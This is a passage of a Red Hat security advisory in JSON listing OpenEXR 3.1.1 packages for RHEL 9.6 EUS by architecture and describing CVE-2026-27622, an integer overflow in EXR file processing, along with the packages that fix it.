"name": "openexr-debuginfo-0:3.1.1-3.el9_6.1.aarch64 as a component of Red Hat Enterprise Linux AppStream EUS (v.9.6)",
"product_id": "AppStream-9.6.0.Z.EUS:openexr-debuginfo-0:3.1.1-3.el9_6.1.aarch64"
},
"product_reference": "openexr-debuginfo-0:3.1.1-3.el9_6.1.aarch64",
"relates_to_product_reference": "AppStream-9.6.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openexr-debuginfo-0:3.1.1-3.el9_6.1.i686 as a component of Red Hat Enterprise Linux AppStream EUS (v.9.6)",
"product_id": "AppStream-9.6.0.Z.EUS:openexr-debuginfo-0:3.1.1-3.el9_6.1.i686"
},
"product_reference": "openexr-debuginfo-0:3.1.1-3.el9_6.1.i686",
"relates_to_product_reference": "AppStream-9.6.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openexr-debuginfo-0:3.1.1-3.el9_6.1.ppc64le as a component of Red Hat Enterprise Linux AppStream EUS (v.9.6)",
"product_id": "AppStream-9.6.0.Z.EUS:openexr-debuginfo-0:3.1.1-3.el9_6.1.ppc64le"
},
"product_reference": "openexr-debuginfo-0:3.1.1-3.el9_6.1.ppc64le",
"relates_to_product_reference": "AppStream-9.6.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openexr-debuginfo-0:3.1.1-3.el9_6.1.s390x as a component of Red Hat Enterprise Linux AppStream EUS (v.9.6)",
"product_id": "AppStream-9.6.0.Z.EUS:openexr-debuginfo-0:3.1.1-3.el9_6.1.s390x"
},
"product_reference": "openexr-debuginfo-0:3.1.1-3.el9_6.1.s390x",
"relates_to_product_reference": "AppStream-9.6.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openexr-debuginfo-0:3.1.1-3.el9_6.1.x86_64 as a component of Red Hat Enterprise Linux AppStream EUS (v.9.6)",
"product_id": "AppStream-9.6.0.Z.EUS:openexr-debuginfo-0:3.1.1-3.el9_6.1.x86_64"
},
"product_reference": "openexr-debuginfo-0:3.1.1-3.el9_6.1.x86_64",
"relates_to_product_reference": "AppStream-9.6.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openexr-debugsource-0:3.1.1-3.el9_6.1.aarch64 as a component of Red Hat Enterprise Linux AppStream EUS (v.9.6)",
"product_id": "AppStream-9.6.0.Z.EUS:openexr-debugsource-0:3.1.1-3.el9_6.1.aarch64"
},
"product_reference": "openexr-debugsource-0:3.1.1-3.el9_6.1.aarch64",
"relates_to_product_reference": "AppStream-9.6.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openexr-debugsource-0:3.1.1-3.el9_6.1.i686 as a component of Red Hat Enterprise Linux AppStream EUS (v.9.6)",
"product_id": "AppStream-9.6.0.Z.EUS:openexr-debugsource-0:3.1.1-3.el9_6.1.i686"
},
"product_reference": "openexr-debugsource-0:3.1.1-3.el9_6.1.i686",
"relates_to_product_reference": "AppStream-9.6.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openexr-debugsource-0:3.1.1-3.el9_6.1.ppc64le as a component of Red Hat Enterprise Linux AppStream EUS (v.9.6)",
"product_id": "AppStream-9.6.0.Z.EUS:openexr-debugsource-0:3.1.1-3.el9_6.1.ppc64le"
},
"product_reference": "openexr-debugsource-0:3.1.1-3.el9_6.1.ppc64le",
"relates_to_product_reference": "AppStream-9.6.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openexr-debugsource-0:3.1.1-3.el9_6.1.s390x as a component of Red Hat Enterprise Linux AppStream EUS (v.9.6)",
"product_id": "AppStream-9.6.0.Z.EUS:openexr-debugsource-0:3.1.1-3.el9_6.1.s390x"
},
"product_reference": "openexr-debugsource-0:3.1.1-3.el9_6.1.s390x",
"relates_to_product_reference": "AppStream-9.6.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openexr-debugsource-0:3.1.1-3.el9_6.1.x86_64 as a component of Red Hat Enterprise Linux AppStream EUS (v.9.6)",
"product_id": "AppStream-9.6.0.Z.EUS:openexr-debugsource-0:3.1.1-3.el9_6.1.x86_64"
},
"product_reference": "openexr-debugsource-0:3.1.1-3.el9_6.1.x86_64",
"relates_to_product_reference": "AppStream-9.6.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openexr-devel-0:3.1.1-3.el9_6.1.aarch64 as a component of Red Hat Enterprise Linux AppStream EUS (v.9.6)",
"product_id": "AppStream-9.6.0.Z.EUS:openexr-devel-0:3.1.1-3.el9_6.1.aarch64"
},
"product_reference": "openexr-devel-0:3.1.1-3.el9_6.1.aarch64",
"relates_to_product_reference": "AppStream-9.6.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openexr-devel-0:3.1.1-3.el9_6.1.i686 as a component of Red Hat Enterprise Linux AppStream EUS (v.9.6)",
"product_id": "AppStream-9.6.0.Z.EUS:openexr-devel-0:3.1.1-3.el9_6.1.i686"
},
"product_reference": "openexr-devel-0:3.1.1-3.el9_6.1.i686",
"relates_to_product_reference": "AppStream-9.6.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openexr-devel-0:3.1.1-3.el9_6.1.ppc64le as a component of Red Hat Enterprise Linux AppStream EUS (v.9.6)",
"product_id": "AppStream-9.6.0.Z.EUS:openexr-devel-0:3.1.1-3.el9_6.1.ppc64le"
},
"product_reference": "openexr-devel-0:3.1.1-3.el9_6.1.ppc64le",
"relates_to_product_reference": "AppStream-9.6.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openexr-devel-0:3.1.1-3.el9_6.1.s390x as a component of Red Hat Enterprise Linux AppStream EUS (v.9.6)",
"product_id": "AppStream-9.6.0.Z.EUS:openexr-devel-0:3.1.1-3.el9_6.1.s390x"
},
"product_reference": "openexr-devel-0:3.1.1-3.el9_6.1.s390x",
"relates_to_product_reference": "AppStream-9.6.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openexr-devel-0:3.1.1-3.el9_6.1.x86_64 as a component of Red Hat Enterprise Linux AppStream EUS (v.9.6)",
"product_id": "AppStream-9.6.0.Z.EUS:openexr-devel-0:3.1.1-3.el9_6.1.x86_64"
},
"product_reference": "openexr-devel-0:3.1.1-3.el9_6.1.x86_64",
"relates_to_product_reference": "AppStream-9.6.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openexr-libs-0:3.1.1-3.el9_6.1.aarch64 as a component of Red Hat Enterprise Linux AppStream EUS (v.9.6)",
"product_id": "AppStream-9.6.0.Z.EUS:openexr-libs-0:3.1.1-3.el9_6.1.aarch64"
},
"product_reference": "openexr-libs-0:3.1.1-3.el9_6.1.aarch64",
"relates_to_product_reference": "AppStream-9.6.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openexr-libs-0:3.1.1-3.el9_6.1.i686 as a component of Red Hat Enterprise Linux AppStream EUS (v.9.6)",
"product_id": "AppStream-9.6.0.Z.EUS:openexr-libs-0:3.1.1-3.el9_6.1.i686"
},
"product_reference": "openexr-libs-0:3.1.1-3.el9_6.1.i686",
"relates_to_product_reference": "AppStream-9.6.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openexr-libs-0:3.1.1-3.el9_6.1.ppc64le as a component of Red Hat Enterprise Linux AppStream EUS (v.9.6)",
"product_id": "AppStream-9.6.0.Z.EUS:openexr-libs-0:3.1.1-3.el9_6.1.ppc64le"
},
"product_reference": "openexr-libs-0:3.1.1-3.el9_6.1.ppc64le",
"relates_to_product_reference": "AppStream-9.6.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openexr-libs-0:3.1.1-3.el9_6.1.s390x as a component of Red Hat Enterprise Linux AppStream EUS (v.9.6)",
"product_id": "AppStream-9.6.0.Z.EUS:openexr-libs-0:3.1.1-3.el9_6.1.s390x"
},
"product_reference": "openexr-libs-0:3.1.1-3.el9_6.1.s390x",
"relates_to_product_reference": "AppStream-9.6.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openexr-libs-0:3.1.1-3.el9_6.1.x86_64 as a component of Red Hat Enterprise Linux AppStream EUS (v.9.6)",
"product_id": "AppStream-9.6.0.Z.EUS:openexr-libs-0:3.1.1-3.el9_6.1.x86_64"
},
"product_reference": "openexr-libs-0:3.1.1-3.el9_6.1.x86_64",
"relates_to_product_reference": "AppStream-9.6.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openexr-libs-debuginfo-0:3.1.1-3.el9_6.1.aarch64 as a component of Red Hat Enterprise Linux AppStream EUS (v.9.6)",
"product_id": "AppStream-9.6.0.Z.EUS:openexr-libs-debuginfo-0:3.1.1-3.el9_6.1.aarch64"
},
"product_reference": "openexr-libs-debuginfo-0:3.1.1-3.el9_6.1.aarch64",
"relates_to_product_reference": "AppStream-9.6.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openexr-libs-debuginfo-0:3.1.1-3.el9_6.1.i686 as a component of Red Hat Enterprise Linux AppStream EUS (v.9.6)",
"product_id": "AppStream-9.6.0.Z.EUS:openexr-libs-debuginfo-0:3.1.1-3.el9_6.1.i686"
},
"product_reference": "openexr-libs-debuginfo-0:3.1.1-3.el9_6.1.i686",
"relates_to_product_reference": "AppStream-9.6.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openexr-libs-debuginfo-0:3.1.1-3.el9_6.1.ppc64le as a component of Red Hat Enterprise Linux AppStream EUS (v.9.6)",
"product_id": "AppStream-9.6.0.Z.EUS:openexr-libs-debuginfo-0:3.1.1-3.el9_6.1.ppc64le"
},
"product_reference": "openexr-libs-debuginfo-0:3.1.1-3.el9_6.1.ppc64le",
"relates_to_product_reference": "AppStream-9.6.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openexr-libs-debuginfo-0:3.1.1-3.el9_6.1.s390x as a component of Red Hat Enterprise Linux AppStream EUS (v.9.6)",
"product_id": "AppStream-9.6.0.Z.EUS:openexr-libs-debuginfo-0:3.1.1-3.el9_6.1.s390x"
},
"product_reference": "openexr-libs-debuginfo-0:3.1.1-3.el9_6.1.s390x",
"relates_to_product_reference": "AppStream-9.6.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openexr-libs-debuginfo-0:3.1.1-3.el9_6.1.x86_64 as a component of Red Hat Enterprise Linux AppStream EUS (v.9.6)",
"product_id": "AppStream-9.6.0.Z.EUS:openexr-libs-debuginfo-0:3.1.1-3.el9_6.1.x86_64"
},
"product_reference": "openexr-libs-debuginfo-0:3.1.1-3.el9_6.1.x86_64",
"relates_to_product_reference": "AppStream-9.6.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openexr-0:3.1.1-3.el9_6.1.aarch64 as a component of Red Hat CodeReady Linux Builder EUS (v.9.6)",
"product_id": "CRB-9.6.0.Z.EUS:openexr-0:3.1.1-3.el9_6.1.aarch64"
},
"product_reference": "openexr-0:3.1.1-3.el9_6.1.aarch64",
"relates_to_product_reference": "CRB-9.6.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openexr-0:3.1.1-3.el9_6.1.ppc64le as a component of Red Hat CodeReady Linux Builder EUS (v.9.6)",
"product_id": "CRB-9.6.0.Z.EUS:openexr-0:3.1.1-3.el9_6.1.ppc64le"
},
"product_reference": "openexr-0:3.1.1-3.el9_6.1.ppc64le",
"relates_to_product_reference": "CRB-9.6.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openexr-0:3.1.1-3.el9_6.1.s390x as a component of Red Hat CodeReady Linux Builder EUS (v.9.6)",
"product_id": "CRB-9.6.0.Z.EUS:openexr-0:3.1.1-3.el9_6.1.s390x"
},
"product_reference": "openexr-0:3.1.1-3.el9_6.1.s390x",
"relates_to_product_reference": "CRB-9.6.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openexr-0:3.1.1-3.el9_6.1.src as a component of Red Hat CodeReady Linux Builder EUS (v.9.6)",
"product_id": "CRB-9.6.0.Z.EUS:openexr-0:3.1.1-3.el9_6.1.src"
},
"product_reference": "openexr-0:3.1.1-3.el9_6.1.src",
"relates_to_product_reference": "CRB-9.6.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openexr-0:3.1.1-3.el9_6.1.x86_64 as a component of Red Hat CodeReady Linux Builder EUS (v.9.6)",
"product_id": "CRB-9.6.0.Z.EUS:openexr-0:3.1.1-3.el9_6.1.x86_64"
},
"product_reference": "openexr-0:3.1.1-3.el9_6.1.x86_64",
"relates_to_product_reference": "CRB-9.6.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openexr-debuginfo-0:3.1.1-3.el9_6.1.aarch64 as a component of Red Hat CodeReady Linux Builder EUS (v.9.6)",
"product_id": "CRB-9.6.0.Z.EUS:openexr-debuginfo-0:3.1.1-3.el9_6.1.aarch64"
},
"product_reference": "openexr-debuginfo-0:3.1.1-3.el9_6.1.aarch64",
"relates_to_product_reference": "CRB-9.6.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openexr-debuginfo-0:3.1.1-3.el9_6.1.i686 as a component of Red Hat CodeReady Linux Builder EUS (v.9.6)",
"product_id": "CRB-9.6.0.Z.EUS:openexr-debuginfo-0:3.1.1-3.el9_6.1.i686"
},
"product_reference": "openexr-debuginfo-0:3.1.1-3.el9_6.1.i686",
"relates_to_product_reference": "CRB-9.6.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openexr-debuginfo-0:3.1.1-3.el9_6.1.ppc64le as a component of Red Hat CodeReady Linux Builder EUS (v.9.6)",
"product_id": "CRB-9.6.0.Z.EUS:openexr-debuginfo-0:3.1.1-3.el9_6.1.ppc64le"
},
"product_reference": "openexr-debuginfo-0:3.1.1-3.el9_6.1.ppc64le",
"relates_to_product_reference": "CRB-9.6.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openexr-debuginfo-0:3.1.1-3.el9_6.1.s390x as a component of Red Hat CodeReady Linux Builder EUS (v.9.6)",
"product_id": "CRB-9.6.0.Z.EUS:openexr-debuginfo-0:3.1.1-3.el9_6.1.s390x"
},
"product_reference": "openexr-debuginfo-0:3.1.1-3.el9_6.1.s390x",
"relates_to_product_reference": "CRB-9.6.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openexr-debuginfo-0:3.1.1-3.el9_6.1.x86_64 as a component of Red Hat CodeReady Linux Builder EUS (v.9.6)",
"product_id": "CRB-9.6.0.Z.EUS:openexr-debuginfo-0:3.1.1-3.el9_6.1.x86_64"
},
"product_reference": "openexr-debuginfo-0:3.1.1-3.el9_6.1.x86_64",
"relates_to_product_reference": "CRB-9.6.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openexr-debugsource-0:3.1.1-3.el9_6.1.aarch64 as a component of Red Hat CodeReady Linux Builder EUS (v.9.6)",
"product_id": "CRB-9.6.0.Z.EUS:openexr-debugsource-0:3.1.1-3.el9_6.1.aarch64"
},
"product_reference": "openexr-debugsource-0:3.1.1-3.el9_6.1.aarch64",
"relates_to_product_reference": "CRB-9.6.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openexr-debugsource-0:3.1.1-3.el9_6.1.i686 as a component of Red Hat CodeReady Linux Builder EUS (v.9.6)",
"product_id": "CRB-9.6.0.Z.EUS:openexr-debugsource-0:3.1.1-3.el9_6.1.i686"
},
"product_reference": "openexr-debugsource-0:3.1.1-3.el9_6.1.i686",
"relates_to_product_reference": "CRB-9.6.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openexr-debugsource-0:3.1.1-3.el9_6.1.ppc64le as a component of Red Hat CodeReady Linux Builder EUS (v.9.6)",
"product_id": "CRB-9.6.0.Z.EUS:openexr-debugsource-0:3.1.1-3.el9_6.1.ppc64le"
},
"product_reference": "openexr-debugsource-0:3.1.1-3.el9_6.1.ppc64le",
"relates_to_product_reference": "CRB-9.6.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openexr-debugsource-0:3.1.1-3.el9_6.1.s390x as a component of Red Hat CodeReady Linux Builder EUS (v.9.6)",
"product_id": "CRB-9.6.0.Z.EUS:openexr-debugsource-0:3.1.1-3.el9_6.1.s390x"
},
"product_reference": "openexr-debugsource-0:3.1.1-3.el9_6.1.s390x",
"relates_to_product_reference": "CRB-9.6.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openexr-debugsource-0:3.1.1-3.el9_6.1.x86_64 as a component of Red Hat CodeReady Linux Builder EUS (v.9.6)",
"product_id": "CRB-9.6.0.Z.EUS:openexr-debugsource-0:3.1.1-3.el9_6.1.x86_64"
},
"product_reference": "openexr-debugsource-0:3.1.1-3.el9_6.1.x86_64",
"relates_to_product_reference": "CRB-9.6.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openexr-devel-0:3.1.1-3.el9_6.1.aarch64 as a component of Red Hat CodeReady Linux Builder EUS (v.9.6)",
"product_id": "CRB-9.6.0.Z.EUS:openexr-devel-0:3.1.1-3.el9_6.1.aarch64"
},
"product_reference": "openexr-devel-0:3.1.1-3.el9_6.1.aarch64",
"relates_to_product_reference": "CRB-9.6.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openexr-devel-0:3.1.1-3.el9_6.1.i686 as a component of Red Hat CodeReady Linux Builder EUS (v.9.6)",
"product_id": "CRB-9.6.0.Z.EUS:openexr-devel-0:3.1.1-3.el9_6.1.i686"
},
"product_reference": "openexr-devel-0:3.1.1-3.el9_6.1.i686",
"relates_to_product_reference": "CRB-9.6.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openexr-devel-0:3.1.1-3.el9_6.1.ppc64le as a component of Red Hat CodeReady Linux Builder EUS (v.9.6)",
"product_id": "CRB-9.6.0.Z.EUS:openexr-devel-0:3.1.1-3.el9_6.1.ppc64le"
},
"product_reference": "openexr-devel-0:3.1.1-3.el9_6.1.ppc64le",
"relates_to_product_reference": "CRB-9.6.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openexr-devel-0:3.1.1-3.el9_6.1.s390x as a component of Red Hat CodeReady Linux Builder EUS (v.9.6)",
"product_id": "CRB-9.6.0.Z.EUS:openexr-devel-0:3.1.1-3.el9_6.1.s390x"
},
"product_reference": "openexr-devel-0:3.1.1-3.el9_6.1.s390x",
"relates_to_product_reference": "CRB-9.6.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openexr-devel-0:3.1.1-3.el9_6.1.x86_64 as a component of Red Hat CodeReady Linux Builder EUS (v.9.6)",
"product_id": "CRB-9.6.0.Z.EUS:openexr-devel-0:3.1.1-3.el9_6.1.x86_64"
},
"product_reference": "openexr-devel-0:3.1.1-3.el9_6.1.x86_64",
"relates_to_product_reference": "CRB-9.6.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openexr-libs-0:3.1.1-3.el9_6.1.aarch64 as a component of Red Hat CodeReady Linux Builder EUS (v.9.6)",
"product_id": "CRB-9.6.0.Z.EUS:openexr-libs-0:3.1.1-3.el9_6.1.aarch64"
},
"product_reference": "openexr-libs-0:3.1.1-3.el9_6.1.aarch64",
"relates_to_product_reference": "CRB-9.6.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openexr-libs-0:3.1.1-3.el9_6.1.i686 as a component of Red Hat CodeReady Linux Builder EUS (v.9.6)",
"product_id": "CRB-9.6.0.Z.EUS:openexr-libs-0:3.1.1-3.el9_6.1.i686"
},
"product_reference": "openexr-libs-0:3.1.1-3.el9_6.1.i686",
"relates_to_product_reference": "CRB-9.6.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openexr-libs-0:3.1.1-3.el9_6.1.ppc64le as a component of Red Hat CodeReady Linux Builder EUS (v.9.6)",
"product_id": "CRB-9.6.0.Z.EUS:openexr-libs-0:3.1.1-3.el9_6.1.ppc64le"
},
"product_reference": "openexr-libs-0:3.1.1-3.el9_6.1.ppc64le",
"relates_to_product_reference": "CRB-9.6.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openexr-libs-0:3.1.1-3.el9_6.1.s390x as a component of Red Hat CodeReady Linux Builder EUS (v.9.6)",
"product_id": "CRB-9.6.0.Z.EUS:openexr-libs-0:3.1.1-3.el9_6.1.s390x"
},
"product_reference": "openexr-libs-0:3.1.1-3.el9_6.1.s390x",
"relates_to_product_reference": "CRB-9.6.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openexr-libs-0:3.1.1-3.el9_6.1.x86_64 as a component of Red Hat CodeReady Linux Builder EUS (v.9.6)",
"product_id": "CRB-9.6.0.Z.EUS:openexr-libs-0:3.1.1-3.el9_6.1.x86_64"
},
"product_reference": "openexr-libs-0:3.1.1-3.el9_6.1.x86_64",
"relates_to_product_reference": "CRB-9.6.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openexr-libs-debuginfo-0:3.1.1-3.el9_6.1.aarch64 as a component of Red Hat CodeReady Linux Builder EUS (v.9.6)",
"product_id": "CRB-9.6.0.Z.EUS:openexr-libs-debuginfo-0:3.1.1-3.el9_6.1.aarch64"
},
"product_reference": "openexr-libs-debuginfo-0:3.1.1-3.el9_6.1.aarch64",
"relates_to_product_reference": "CRB-9.6.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openexr-libs-debuginfo-0:3.1.1-3.el9_6.1.i686 as a component of Red Hat CodeReady Linux Builder EUS (v.9.6)",
"product_id": "CRB-9.6.0.Z.EUS:openexr-libs-debuginfo-0:3.1.1-3.el9_6.1.i686"
},
"product_reference": "openexr-libs-debuginfo-0:3.1.1-3.el9_6.1.i686",
"relates_to_product_reference": "CRB-9.6.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openexr-libs-debuginfo-0:3.1.1-3.el9_6.1.ppc64le as a component of Red Hat CodeReady Linux Builder EUS (v.9.6)",
"product_id": "CRB-9.6.0.Z.EUS:openexr-libs-debuginfo-0:3.1.1-3.el9_6.1.ppc64le"
},
"product_reference": "openexr-libs-debuginfo-0:3.1.1-3.el9_6.1.ppc64le",
"relates_to_product_reference": "CRB-9.6.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openexr-libs-debuginfo-0:3.1.1-3.el9_6.1.s390x as a component of Red Hat CodeReady Linux Builder EUS (v.9.6)",
"product_id": "CRB-9.6.0.Z.EUS:openexr-libs-debuginfo-0:3.1.1-3.el9_6.1.s390x"
},
"product_reference": "openexr-libs-debuginfo-0:3.1.1-3.el9_6.1.s390x",
"relates_to_product_reference": "CRB-9.6.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openexr-libs-debuginfo-0:3.1.1-3.el9_6.1.x86_64 as a component of Red Hat CodeReady Linux Builder EUS (v.9.6)",
"product_id": "CRB-9.6.0.Z.EUS:openexr-libs-debuginfo-0:3.1.1-3.el9_6.1.x86_64"
},
"product_reference": "openexr-libs-debuginfo-0:3.1.1-3.el9_6.1.x86_64",
"relates_to_product_reference": "CRB-9.6.0.Z.EUS"
}
]
},
"vulnerabilities": [
{
"cve": "CVE-2026-27622",
"cwe": {
"id": "CWE-190",
"name": "Integer Overflow or Wraparound"
},
"discovery_date": "2026-03-03T23:02:15.379586+00:00",
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2444251"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in OpenEXR, an image storage format library for the motion picture industry. An attacker can craft a malicious EXR file that, when processed, causes an integer overflow in the `CompositeDeepScanLine::readPixels` function. This overflow leads to an undersized buffer allocation, which can then be overrun during write operations. Successful exploitation could result in arbitrary code execution or a denial of service (DoS).",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "openexr: OpenEXR: Arbitrary code execution via integer overflow in EXR file processing",
"title": "Vulnerability summary"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"AppStream-9.6.0.Z.EUS:openexr-0:3.1.1-3.el9_6.1.aarch64",
"AppStream-9.6.0.Z.EUS:openexr-0:3.1.1-3.el9_6.1.ppc64le",
"AppStream-9.6.0.Z.EUS:openexr-0:3.1.1-3.el9_6.1.s390x",
"AppStream-9.6.0.Z.EUS:openexr-0:3.1.1-3.el9_6.1.src",
"AppStream-9.6.0.Z.EUS:openexr-0:3.1.1-3.el9_6.1.x86_64",
"AppStream-9.6.0.Z.EUS:openexr-debuginfo-0:3.1.1-3.el9_6.1.aarch64",
"AppStream-9.6.0.Z.EUS:openexr-debuginfo-0:3.1.1-3.el9_6.1.i686",
"AppStream-9.6.0.Z.EUS:openexr-debuginfo-0:3.1.1-3.el9_6.1.ppc64le",
"AppStream-9.6.0.Z.EUS:openexr-debuginfo-0:3.1.1-3.el9_6.1.s390x",
"AppStream-9.6.0.Z.EUS:openexr-debuginfo-0:3.1.1-3.el9_6.1.x86_64",
"AppStream-9.6.0.Z.EUS:openexr-debugsource-0:3.1.1-3.el9_6.1.aarch64",
"AppStream-9.6.0.Z.EUS:openexr-debugsource-0:3.1.1-3.el9_6.1.i686",
"AppStream-9.6.0.Z.EUS:openexr-debugsource-0:3.1.1-3.el9_6.1.ppc64le",
"AppStream-9.6.0.Z.EUS:openexr-debugsource-0:3.1.1-3.el9_6.1.s390x",
"AppStream-9.6.0.Z.EUS:openexr-debugsource-0:3.1.1-3.el9_6.1.x86_64",
"AppStream-9.6.0.Z.EUS:openexr-devel-0:3.1.1-3.el9_6.1.aarch64",
"AppStream-9.6.0.Z.EUS:openexr-devel-0:3.1.1-3.el9_6.1.i686",
"AppStream-9.6.0.Z.EUS:openexr-devel-0:3.1.1-3.el9_6.1.ppc64le",
"AppStream-9.6.0.Z.EUS:openexr-devel-0:3.1.1-3.el9_6.1.s390x",
"AppStream-9.6.0.Z.EUS:openexr-devel-0:3.1.1-3.el9_6.1.x86_64",
"AppStream-9.6.0.Z.EUS:openexr-libs-0:3.1.1-3.el9_6.1.aarch64",
"AppStream-9.6.0.Z.EUS:openexr-libs-0:3.1.1-3.el9_6.1.i686",
"AppStream-9.6.0.Z.EUS:openexr-libs-0:3.1.1-3.el9_6.1.ppc64le",
"AppStream-9.6.0.Z.EUS:openexr-libs-0:3.1.1-3.el9_6.1.s390x",
"AppStream-9.6.0.Z.EUS:openexr-libs-0:3.1.1-3.el9_6.1.x86_64",
"AppStream-9.6.0.Z.EUS:openexr-libs-debuginfo-0:3.1.1-3.el9_6.1.aarch64",
"AppStream-9.6.0.Z.EUS:openexr-libs-debuginfo-0:3.1.1-3.el9_6.1.i686",
"AppStream-9.6.0.Z.EUS:openexr-libs-debuginfo-0:3.1.1-3.el9_6.1.ppc64le",
"AppStream-9.6.0.Z.EUS:openexr-libs-debuginfo-0:3.1.1-3.el9_6.1.s390x",
"AppStream-9.6.0.Z.EUS:openexr-libs-debuginfo-0:3.1.1-3.el9_6.1.x86_64",
"CRB-9.6.0.Z.EUS:openexr-0:3.1.1-3.el9_6.1.aarch64",
"CRB-9.6.0.Z.EUS:openexr-0:3.1.1-3.el9_6.1.ppc64le",
"CRB-9.6.0.Z.EUS:openexr-0:3.1.1-3.el9_6.1.s390x",
"CRB-9.6.0.Z.EUS:openexr-0:3.1.1-3.el9_6.1.src",
"CRB-9.6.0.Z.EUS:openexr-0:3.1.1-3.el9_6.1.x86_64",
"CRB-9.6.0.Z.EUS:openexr-debuginfo-0:3.1.1-3.el9_6.1.aarch64",
"CRB-9.6.0.Z.EUS:openexr-debuginfo-0:3.1.1-3.el9_6.1.i686",
"CRB-9.6.0.Z.EUS:openexr-debuginfo-0:3.1.1-3.el9_6.1.ppc64le",
"CRB-9.6.0.Z.EUS:openexr-debuginfo-0:3.1.1-3.el9_6.1.s390x",
"CRB-9.6.0.Z.EUS:openexr-debuginfo-0:3.1.1-3.el9_6.1.x86_64",
"CRB-9.6.0.Z.EUS:openexr-debugsource-0:3.1.1-3.el9_6.1.aarch64",
"CRB-9.6.0.Z.EUS:openexr-debugsource-0:3.1.1-3.el9_6.1.i686",
"CRB-9.6.0.Z.EUS:openexr-debugsource-0:3.1.1-3.el9_6.1.ppc64le",
"CRB-9.6.0.Z.EUS:openexr-debugsource-0:3.1.1-3.el9_6.1.s390x",
"CRB-9.6.0.Z.EUS:openexr-debugsource-0:3.1.1-3.el9_6.1.x86_64",
"CRB-9.6.0.Z.EUS:openexr-devel-0:3.1.1-3.el9_6.1.aarch64",
"CRB-9.6.0.Z.EUS:openexr-devel-0:3.1.1-3.el9_6.1.i686",
"CRB-9.6.0.Z.EUS:openexr-devel-0:3.1.1-3.el9_6.1.ppc64le",
"CRB-9.6.0.Z.EUS:openexr-devel-0:3.1.1-3.el9_6.1.s390x",
"CRB-9.6.0.Z.EUS:openexr-devel-0:3.1.1-3.el9_6.1.x86_64",
"CRB-9.6.0.Z.EUS:openexr-libs-0:3.1.1-3.el9_6.1.aarch64",
"CRB-9.6.0.Z.EUS:openexr-libs-0:3.1.1-3.el9_6.1.i686",
"CRB-9.6.0.Z.EUS:openexr-libs-0:3.1.1-3.el9_6.1.ppc64le",
"CRB-9.6.0.Z.EUS:openexr-libs-0:3.1.1-3.el9_6.1.s390x",
